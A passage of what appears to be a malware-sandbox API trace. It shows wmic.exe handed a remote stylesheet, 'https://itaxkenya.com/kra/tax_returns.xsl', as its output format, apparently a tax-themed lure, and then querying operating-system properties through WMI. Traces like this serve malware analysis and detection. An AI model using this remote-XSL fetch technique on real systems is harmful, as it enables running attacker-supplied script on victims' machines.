lpString1="https://itaxkenya.com/kra/tax_returns.xsl", cchCount1=41, lpString2="/", cchCount2=1) returned 3 [0050.639] lstrlenW (lpString="-") returned 1 [0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="https://itaxkenya.com/kra/tax_returns.xsl", cchCount1=41, lpString2="-", cchCount2=1) returned 3 [0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.639] lstrlenW (lpString="CSV") returned 3 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CSV", cchCount1=3, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1 [0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.639] lstrlenW (lpString="HFORM") returned 5 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HFORM", cchCount1=5, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1 [0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.639] lstrlenW (lpString="HTABLE") returned 6 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="HTABLE", cchCount1=6, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1 [0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.639] lstrlenW (lpString="LIST") returned 4 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LIST", cchCount1=4, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.639] lstrlenW (lpString="MOF") returned 3 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MOF", cchCount1=3, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.639] lstrlenW (lpString="RAWXML") returned 6 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="RAWXML", cchCount1=6, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.639] lstrlenW (lpString="TABLE") returned 5 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="TABLE", cchCount1=5, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.639] lstrlenW (lpString="VALUE") returned 5 [0050.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="VALUE", cchCount1=5, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.639] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.639] lstrlenW (lpString="XML") returned 3 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XML", cchCount1=3, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.640] lstrlenW (lpString="htable-sortby") returned 13 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="htable-sortby", cchCount1=13, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1 [0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.640] lstrlenW (lpString="htable-sortby.xsl") returned 17 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="htable-sortby.xsl", cchCount1=17, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 1 [0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.640] lstrlenW (lpString="texttablewsys") returned 13 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="texttablewsys", cchCount1=13, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.640] lstrlenW (lpString="texttablewsys.xsl") returned 17 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="texttablewsys.xsl", cchCount1=17, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.640] lstrlenW (lpString="wmiclimofformat") returned 15 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclimofformat", cchCount1=15, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.640] lstrlenW (lpString="wmiclimofformat.xsl") returned 19 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclimofformat.xsl", cchCount1=19, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.640] lstrlenW (lpString="wmiclitableformat") returned 17 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformat", cchCount1=17, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.640] lstrlenW (lpString="wmiclitableformat.xsl") returned 21 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformat.xsl", cchCount1=21, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.640] lstrlenW (lpString="wmiclitableformatnosys") returned 22 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformatnosys", cchCount1=22, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.640] lstrlenW (lpString="wmiclitableformatnosys.xsl") returned 26 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclitableformatnosys.xsl", cchCount1=26, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.640] lstrlenW (lpString="wmiclivalueformat") returned 17 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclivalueformat", cchCount1=17, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.640] lstrlenW (lpString="https://itaxkenya.com/kra/tax_returns.xsl") returned 41 [0050.640] lstrlenW (lpString="wmiclivalueformat.xsl") returned 21 [0050.640] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="wmiclivalueformat.xsl", cchCount1=21, lpString2="https://itaxkenya.com/kra/tax_returns.xsl", cchCount2=41) returned 3 [0050.640] ??0CHString@@QEAA@PEBG@Z () returned 0x350027f148 [0050.640] ?Right@CHString@@QEBA?AV1@H@Z () returned 0x350027f140 [0050.640] ??0CHString@@QEAA@PEBG@Z () returned 0x350027f198 [0050.640] _wcsicmp (_String1=".xsl", _String2=".xsl") returned 0 [0050.640] ??1CHString@@QEAA@XZ () returned 0x1 [0050.640] ??1CHString@@QEAA@XZ () returned 0x1 [0050.640] ??1CHString@@QEAA@XZ () returned 0x1 [0050.640] GetCurrentThreadId () returned 0xdf0 [0050.640] ??0CHString@@QEAA@XZ () returned 0x350027f048 [0050.641] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0050.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bdbc0, cbMultiByte=-1, lpWideCharStr=0x233e14fbcf0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0050.641] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0050.641] SysStringLen (param_1="os") returned 0x2 [0050.641] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='os") returned 0x1e [0050.641] SysStringLen (param_1="'") returned 0x1 [0050.641] IWbemServices:GetObject (in: This=0x233e1287c80, strObjectPath="MSFT_CliAlias.FriendlyName='os'", lFlags=0, pCtx=0x0, ppObject=0x350027f088*=0x0, ppCallResult=0x0 | out: ppObject=0x350027f088*=0x233e12748a0, ppCallResult=0x0) returned 0x0 [0050.648] IWbemClassObject:Get (in: This=0x233e12748a0, wszName="Formats", lFlags=0, pVal=0x350027f110*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f110*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128c210*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e128bcc0, rgsabound=((cElements=0x7, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.650] lstrlenW (lpString="SET") returned 3 [0050.650] lstrlenW (lpString="get") returned 3 [0050.650] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1 [0050.650] SafeArrayGetLBound (in: psa=0x233e128c210, nDim=0x1, plLbound=0x350027f0b0 | out: plLbound=0x350027f0b0) returned 0x0 [0050.650] SafeArrayGetUBound (in: psa=0x233e128c210, nDim=0x1, plUbound=0x350027f0c8 | out: plUbound=0x350027f0c8) returned 0x0 [0050.650] SafeArrayGetElement (in: psa=0x233e128c210, rgIndices=0x350027f098, pv=0x350027f068 | out: pv=0x350027f068) returned 0x0 [0050.650] IWbemClassObject:Get (in: This=0x233e12b6be0, wszName="Name", lFlags=0, pVal=0x350027f0e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f0e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STATUS", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.650] lstrlenW (lpString="FULL") returned 4 [0050.650] lstrlenW (lpString="STATUS") returned 6 [0050.650] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STATUS", cchCount1=6, lpString2="FULL", cchCount2=4) returned 3 [0050.650] IUnknown:Release (This=0x233e12b6be0) returned 0x1 [0050.650] SafeArrayGetElement (in: psa=0x233e128c210, rgIndices=0x350027f098, pv=0x350027f068 | out: pv=0x350027f068) returned 0x0 [0050.650] IWbemClassObject:Get (in: This=0x233e1274b50, wszName="Name", lFlags=0, pVal=0x350027f0e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128e438, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f0e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FREE", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.650] lstrlenW (lpString="FULL") returned 4 [0050.650] lstrlenW (lpString="FREE") returned 4 [0050.650] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FREE", cchCount1=4, lpString2="FULL", cchCount2=4) returned 1 [0050.651] IUnknown:Release (This=0x233e1274b50) returned 0x1 [0050.651] SafeArrayGetElement (in: psa=0x233e128c210, rgIndices=0x350027f098, pv=0x350027f068 | out: pv=0x350027f068) returned 0x0 [0050.651] IWbemClassObject:Get (in: This=0x233e12c4720, wszName="Name", lFlags=0, pVal=0x350027f0e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128e438, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f0e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="FULL", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.651] lstrlenW (lpString="FULL") returned 4 [0050.651] lstrlenW (lpString="FULL") returned 4 [0050.651] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="FULL", cchCount1=4, lpString2="FULL", cchCount2=4) returned 2 [0050.651] IWbemClassObject:Get (in: This=0x233e12c4720, wszName="Properties", lFlags=0, pVal=0x350027f128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f128*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128b6d0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1274e00, rgsabound=((cElements=0x33, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.653] SafeArrayGetLBound (in: psa=0x233e128b6d0, nDim=0x1, plLbound=0x350027f0d0 | out: plLbound=0x350027f0d0) returned 0x0 [0050.653] SafeArrayGetUBound (in: psa=0x233e128b6d0, nDim=0x1, plUbound=0x350027f0d8 | out: plUbound=0x350027f0d8) returned 0x0 [0050.653] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.653] IWbemClassObject:Get (in: This=0x233e12d1730, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BootDevice", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.653] IWbemClassObject:Get (in: This=0x233e12d1730, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BootDevice", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.653] GetCurrentThreadId () returned 0xdf0 [0050.653] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.653] IWbemClassObject:Get (in: This=0x233e12d1730, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The BootDevice property indicates the name of the disk drive from which the Win32 operating system boots. /nExample: \\\\Device\\Harddisk0.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.653] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.653] lstrlenA (lpString="") returned 0 [0050.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fbd40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.654] SysStringLen (param_1="The BootDevice property indicates the name of the disk drive from which the Win32 operating system boots. /nExample: \\\\Device\\Harddisk0.") returned 0x88 [0050.654] SysStringLen (param_1="") returned 0x0 [0050.654] GetCurrentThreadId () returned 0xdf0 [0050.654] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.654] IWbemClassObject:Get (in: This=0x233e12d1730, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.654] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.654] IUnknown:Release (This=0x233e12d1730) returned 0x1 [0050.654] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.654] IWbemClassObject:Get (in: This=0x233e12d1ca0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128e5e8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BuildNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.654] IWbemClassObject:Get (in: This=0x233e12d1ca0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12910e8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BuildNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.654] GetCurrentThreadId () returned 0xdf0 [0050.654] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.654] IWbemClassObject:Get (in: This=0x233e12d1ca0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The BuildNumber property indicates the build number of the operating system. It can be used for more precise versioning information than product release version numbers/nExample: 1381", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.655] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.655] lstrlenA (lpString="") returned 0 [0050.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fbd40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.655] SysStringLen (param_1="The BuildNumber property indicates the build number of the operating system. It can be used for more precise versioning information than product release version numbers/nExample: 1381") returned 0xb8 [0050.655] SysStringLen (param_1="") returned 0x0 [0050.655] GetCurrentThreadId () returned 0xdf0 [0050.655] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.655] IWbemClassObject:Get (in: This=0x233e12d1ca0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.655] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.656] SysStringLen (param_1="BuildNumber") returned 0xb [0050.656] SysStringLen (param_1="BootDevice") returned 0xa [0050.656] SysStringLen (param_1="BootDevice") returned 0xa [0050.656] SysStringLen (param_1="BuildNumber") returned 0xb [0050.656] IUnknown:Release (This=0x233e12d1ca0) returned 0x1 [0050.656] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.656] IWbemClassObject:Get (in: This=0x233e12d21d0, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1291328, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BuildType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.657] IWbemClassObject:Get (in: This=0x233e12d21d0, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290c98, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BuildType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.657] GetCurrentThreadId () returned 0xdf0 [0050.657] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.657] IWbemClassObject:Get (in: This=0x233e12d21d0, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The BuildType property indicates the type of build used for the operating system. Examples are retail build and checked build.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.657] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.657] lstrlenA (lpString="") returned 0 [0050.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fbd40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.657] SysStringLen (param_1="The BuildType property indicates the type of build used for the operating system. Examples are retail build and checked build.") returned 0x7e [0050.657] SysStringLen (param_1="") returned 0x0 [0050.657] GetCurrentThreadId () returned 0xdf0 [0050.658] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.658] IWbemClassObject:Get (in: This=0x233e12d21d0, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.658] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.658] SysStringLen (param_1="BuildType") returned 0x9 [0050.658] SysStringLen (param_1="BootDevice") returned 0xa [0050.658] SysStringLen (param_1="BuildType") returned 0x9 [0050.658] SysStringLen (param_1="BuildNumber") returned 0xb [0050.658] SysStringLen (param_1="BuildNumber") returned 0xb [0050.658] SysStringLen (param_1="BuildType") returned 0x9 [0050.659] IUnknown:Release (This=0x233e12d21d0) returned 0x1 [0050.659] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.659] IWbemClassObject:Get (in: This=0x233e12d2b60, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e1290c68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CodeSet", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.659] IWbemClassObject:Get (in: This=0x233e12d2b60, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12911a8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CodeSet", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.659] GetCurrentThreadId () returned 0xdf0 [0050.659] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.659] IWbemClassObject:Get (in: This=0x233e12d2b60, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The CodeSet property indicates the code page value used by the operating system. A code page contains a character table used by the operating system to translate strings for different languages. The American National Standards Institute (ANSI) lists values that represent defined code pages. If the operating system does not use an ANSI code page, this member will be set to 0. The CodeSet string can use up to six characters to define the code page value./nExample: 1255.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.659] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.660] lstrlenA (lpString="") returned 0 [0050.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fbd40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.660] SysStringLen (param_1="The CodeSet property indicates the code page value used by the operating system. A code page contains a character table used by the operating system to translate strings for different languages. The American National Standards Institute (ANSI) lists values that represent defined code pages. If the operating system does not use an ANSI code page, this member will be set to 0. The CodeSet string can use up to six characters to define the code page value./nExample: 1255.") returned 0x1d8 [0050.660] SysStringLen (param_1="") returned 0x0 [0050.660] GetCurrentThreadId () returned 0xdf0 [0050.660] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.660] IWbemClassObject:Get (in: This=0x233e12d2b60, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bd90*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1270ea0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.660] SafeArrayGetLBound (in: psa=0x233e128bd90, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0 [0050.660] SafeArrayGetUBound (in: psa=0x233e128bd90, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0 [0050.660] SafeArrayGetElement (in: psa=0x233e128bd90, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0 [0050.660] IWbemClassObject:Get (in: This=0x233e12e4f20, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxLen", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.660] IWbemClassObject:Get (in: This=0x233e12e4f20, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e128bed0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e12711a0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.660] SafeArrayGetLBound (in: psa=0x233e128bed0, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0 [0050.660] SafeArrayGetUBound (in: psa=0x233e128bed0, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0 [0050.660] lstrlenW (lpString="CIMTYPE") returned 7 [0050.660] lstrlenW (lpString="MaxLen") returned 6 [0050.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3 [0050.661] lstrlenW (lpString="read") returned 4 [0050.661] lstrlenW (lpString="MaxLen") returned 6 [0050.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="read", cchCount2=4) returned 1 [0050.661] lstrlenW (lpString="write") returned 5 [0050.661] lstrlenW (lpString="MaxLen") returned 6 [0050.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="write", cchCount2=5) returned 1 [0050.661] lstrlenW (lpString="In") returned 2 [0050.661] lstrlenW (lpString="MaxLen") returned 6 [0050.661] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="In", cchCount2=2) returned 3 [0050.661] lstrlenW (lpString="Out") returned 3 [0050.661] lstrlenW (lpString="MaxLen") returned 6 [0050.661] 